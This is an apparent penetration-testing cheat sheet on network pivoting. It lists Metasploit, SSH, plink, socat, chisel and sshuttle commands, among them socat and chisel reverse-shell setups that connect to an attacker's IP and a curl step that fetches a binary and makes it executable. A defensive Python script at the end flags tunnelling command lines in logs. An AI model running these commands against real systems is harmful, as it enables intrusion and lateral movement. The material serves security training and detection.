Pivoting

HackingSkills
May 10, 2022


1- Metasploit:

After exploiting one machine and getting a meterpreter session on it, run the following commands:

1- run autoroute -s target_ip_network

2- run post/windows/arp_scanner target_ip_network → to see the reachable active hosts.

3- use /auxiliary/server/socks → to open a proxy channel.

4- Then use proxychains on the attacking machine to run commands like nmap.

2- Without Metasploit:

There are various tools for that:

· SSH tunneling and port forwarding:

1- Forward connection: run the following command on the attacking machine:

A- ssh -L LOCAL_PORT:DESTINATION_IP:DESTINATION_PORT USER@SSH_SERVER -fN

2- Create a proxy using ssh: run the following command on the attacking machine:

A- ssh -D PORT USER@SSH_SERVER -fN

· Plink.exe (it’s for Windows, because it doesn’t have an SSH server):

1- sudo apt install putty-tools

2- cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:DESTINATION_IP:DESTINATION_PORT USER@IP -i KEYFILE -N

3- puttygen KEYFILE -o FILE.ppk

· Socat

1- Reverse shell:

A- On attacking → nc -nlvp port

B- On target → ./socat tcp-l:LOCAL_PORT tcp:attacking_ip:port

2- Port forward:

A- On attacking → ./socat tcp-l:port tcp-l:port,fork,reuseaddr

B- On target → ./socat tcp:attacking_ip:port tcp:target_ip:port,fork

· Chisel (it’s for Windows and Linux):

1- Reverse shell:

A- On attacking → ./chisel server -p PORT --reverse

B- On target → ./chisel client attacking_ip:port R:socks

2- Forward shell proxy:

A- On attacking → ./chisel server -p PORT --socks5

B- On target → ./chisel client target_ip:attacking_port proxy_port:socks

· Sshuttle

1- sshuttle -r USER@IP_SERVER SUBNET -x IP_SERVER

2- --ssh-cmd "ssh -i priv-key"

Use wget URL -q → to download a file

To transfer a file from the attacking machine to the target machine:

A1- scp -i KEY chisel user@target:/tmp/chisel-USERNAME

B1- On the attacking → sudo python3 -m http.server 80

B2- On the target → curl ATTACKING_IP/socat -o /tmp/socat-USERNAME && chmod +x /tmp/socat-USERNAME
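
From the defender's side, each tunnelling command listed above leaves a recognisable process command line. The following is an added example, not part of the original post: it labels such command lines as they would appear in process-creation logs. The function name classify, the label strings and the sample lines (documentation address ranges) are assumptions constructed for illustration.

```python
import re
import shlex

TCP_ADDR = re.compile(r"^tcp[46]?(-l|-listen|-connect)?:", re.I)
SSH_FWD = re.compile(r"^-(?:[A-Za-z]*([LDR])|([LDR])\S+)$")
KIND = {"L": "local", "R": "remote", "D": "dynamic"}

def classify(cmdline):
    """Label a process command line that sets up a tunnel, else return None."""
    try:
        argv = shlex.split(cmdline, posix=False)  # keeps Windows backslashes
    except ValueError:  # unbalanced quote in the logged line
        argv = cmdline.split()
    if not argv:
        return None
    # Drop the directory part and .exe so ./plink.exe and plink compare equal.
    prog = re.sub(r"\.exe$", "", re.split(r"[\\/]", argv[0])[-1].lower())
    args = argv[1:]
    if prog in ("ssh", "plink"):
        for a in args:
            if m := SSH_FWD.match(a):
                return f"{prog}-{KIND[m.group(1) or m.group(2)]}-forward"
    elif prog.startswith("chisel"):
        if "server" in args and {"--reverse", "--socks5"} & set(args):
            return "chisel-server"
        if "client" in args and any(re.search(r"^R:|:socks$", a) for a in args):
            return "chisel-client"
    elif prog == "socat":  # two TCP endpoints means socat is relaying
        if sum(bool(TCP_ADDR.match(a)) for a in args) >= 2:
            return "socat-tcp-relay"
    elif prog == "sshuttle" and {"-r", "--remote"} & set(args):
        return "sshuttle"
    return None

# Constructed sample command lines (documentation address ranges, not real hosts).
SAMPLE = [
    "ssh -L 8000:10.200.1.5:80 user@192.0.2.10 -fN",
    "ssh -D 1080 user@192.0.2.10 -fN",
    r".\plink.exe -R 8000:10.200.1.5:80 user@198.51.100.7 -i key.ppk -N",
    "./socat tcp:198.51.100.7:8001 tcp:10.200.1.5:3389,fork",
    "./chisel client 198.51.100.7:9000 R:socks",
    "sshuttle -r user@192.0.2.10 10.200.1.0/24 -x 192.0.2.10",
    "ssh admin@192.0.2.10",       # plain login, no forwarding
    "socat - tcp:192.0.2.10:80",  # single TCP endpoint, not a relay
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(f"{classify(line) or '-':22} {line}")
```

Renamed binaries (the /tmp/chisel-USERNAME pattern above still matches on the chisel prefix, but an arbitrary name would not) need a hash or behaviour-based rule in addition to this command-line match.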
